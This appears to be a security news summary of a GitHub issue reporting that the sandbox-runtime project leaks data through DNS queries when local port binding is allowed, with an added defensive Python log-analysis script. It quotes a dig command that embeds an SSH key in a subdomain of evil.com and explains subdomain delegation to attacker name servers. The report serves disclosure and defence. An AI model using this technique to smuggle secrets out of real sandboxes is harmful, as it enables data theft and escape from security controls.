TL;DR
A reported issue in the sandbox-runtime project shows DNS queries can leak data when local port binding is allowed. A test using a specially crafted subdomain returned an A record from an attacker-controlled name server despite domain restrictions.
What happened
A contributor opened an issue showing a configuration in which network.allowedDomains and network.deniedDomains are empty and allowLocalBinding is set to true. Using the sandbox CLI with that settings file, they ran a dig lookup for a hostname that embedded an SSH key (your-ssh-key.a.evil.com). The expected behavior was that the query would be blocked because evil.com was not on the allow list. Instead, the query resolved.

The report explains why: an attacker can delegate a subdomain (a.evil.com) to name servers they control, so public recursive resolvers (the report names providers such as Google and Cloudflare) forward the A query for the crafted name to the attacker's authoritative servers, which receive the embedded string as part of the query itself. The issue includes dig output showing an A record response, the resolver IP (192.168.0.1), and a returned address (66.96.146.129) with a timestamp of Mon Jan 12 17:29:41 EST 2026. The issue was opened by user srcreigh in the anthropic-experimental/sandbox-runtime repo.
Why it matters
- Allowing local port binding may enable outbound DNS resolution paths that leak data embedded in queried hostnames.
- Attackers can exfiltrate secrets by causing resolvers to ask authoritative servers they control about names that include sensitive strings.
- The behavior affects any sandboxed environment that permits local port binding, per the report.
- DNS resolution chains involving public recursive resolvers can bypass application-level domain allowlists via delegation.
Key facts
- Repository: anthropic-experimental/sandbox-runtime (issue #88).
- Issue opened and edited by user srcreigh; publication recorded on 2026-01-13.
- settings.json used in the report shows network.allowedDomains and network.deniedDomains as empty and allowLocalBinding set to true.
- Test command in the report: srt --settings settings.json 'dig your-ssh-key.a.evil.com'.
- Expected: the DNS query would be blocked because evil.com was not allowed. Actual: the query returned an A record.
- Mechanism described: delegation of a subdomain (NS record for a.evil.com) lets public resolvers forward queries to attacker-controlled authoritative servers.
- Example dig output included: returned A 66.96.146.129, SERVER: 192.168.0.1#53, WHEN: Mon Jan 12 17:29:41 EST 2026.
- The issue statement concludes that any sandbox with local port binding enabled is at risk of this form of data exfiltration.
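As an added example (not code from the sandbox-runtime project or from the issue report), the following Python applies two checks a defender would run over resolver query logs: a suffix-match allow/deny policy of the kind the reporter expected the sandbox to enforce, and a label heuristic that flags long or high-entropy labels below the registrable domain. The log format, the sample query names, and the policy semantics (an empty allow list permits nothing; deny wins over allow) are assumptions made here, not the project's actual behavior.

```python
"""Added example: allow/deny policy check plus a label heuristic for DNS
queries that may carry embedded data. Not from the sandbox-runtime project
or the issue report; log format and policy semantics are assumptions."""
import math
from collections import Counter

# Constructed resolver log lines in a hypothetical "client qname qtype" format.
# The second line mirrors the name used in the report; the third is a
# constructed hex-looking label of the kind encoded exfiltration produces.
SAMPLE_LOG = """\
10.0.0.5 api.github.com A
10.0.0.5 your-ssh-key.a.evil.com A
10.0.0.7 4d9f2c7ab1e03f5c9a8b7d6e5f4a3b2c.a.evil.com A
10.0.0.9 pypi.org A
"""


def domain_allowed(qname, allowed, denied):
    """Suffix match: qname passes if it equals or is a subdomain of an
    allowed domain and is not under a denied one. An empty allow list
    permits nothing (the policy the reporter expected)."""
    name = qname.rstrip(".").lower()

    def matches(dom):
        dom = dom.lower().lstrip(".")
        return name == dom or name.endswith("." + dom)

    if any(matches(d) for d in denied):
        return False
    return any(matches(d) for d in allowed)


def shannon_entropy(s):
    """Bits per character of the label; encoded blobs score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def suspicious_labels(qname, max_label=20, min_entropy=3.5):
    """Return labels below the second-level domain that look like
    encoded data (long, or with high character entropy)."""
    labels = qname.rstrip(".").split(".")
    flagged = []
    for label in labels[:-2]:  # skip e.g. "evil" and "com"
        if len(label) >= max_label or shannon_entropy(label) >= min_entropy:
            flagged.append(label)
    return flagged


def analyze(log_text, allowed, denied):
    """Flag every query that fails policy or carries suspicious labels."""
    findings = []
    for line in log_text.splitlines():
        client, qname, _qtype = line.split()
        policy_ok = domain_allowed(qname, allowed, denied)
        labels = suspicious_labels(qname)
        if not policy_ok or labels:
            findings.append({"client": client, "qname": qname,
                             "policy_ok": policy_ok, "suspicious": labels})
    return findings


if __name__ == "__main__":
    # Reporter's settings: both lists empty, so nothing should be allowed.
    for f in analyze(SAMPLE_LOG, allowed=[], denied=[]):
        print(f)
    print("--- with an allow list ---")
    for f in analyze(SAMPLE_LOG, allowed=["github.com", "pypi.org"], denied=[]):
        print(f)
```

Note that the report's readable label your-ssh-key is short and low-entropy, so the content heuristic alone does not flag it; the policy decision (the name is not under any allowed domain) is what catches it. This is why a domain allowlist has to be applied to the query before it leaves the sandbox, rather than relying on content-based detection after the fact.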
What to watch next
- Whether maintainers of sandbox-runtime will publish a fix or mitigation and what the timeline will be (not confirmed in the source).
- Whether public recursive resolver operators or DNS software vendors change behavior to mitigate this pattern (not confirmed in the source).
- Whether other sandbox projects will audit local port binding settings in response to this report (not confirmed in the source).
Quick glossary
- allowLocalBinding: A configuration option that permits binding to local network ports from inside a sandboxed environment.
- DNS delegation / NS record: A DNS delegation uses NS records to designate which authoritative name servers are responsible for a particular subdomain.
- recursive resolver: A DNS resolver that answers client queries by performing the necessary lookups across the DNS hierarchy, potentially querying authoritative servers.
- dig: A command-line tool used to perform DNS lookups and display detailed information about query results.
- data exfiltration: The unauthorized transfer of data from a system to an external recipient.
Reader FAQ
Did the report demonstrate actual data leakage?
The issue includes a test that resulted in a DNS A record response for a hostname containing the test string, demonstrating that DNS queries carrying that string reached an authoritative server.
Is this limited to the sandbox-runtime project?
The reporter states that any sandbox with local port binding enabled is at risk; broader impact beyond this repository is not fully enumerated in the source.
Has a patch been released?
Not confirmed in the source.
Who reported the issue and when?
The issue was opened by user srcreigh and posted to the anthropic-experimental/sandbox-runtime repository in January 2026.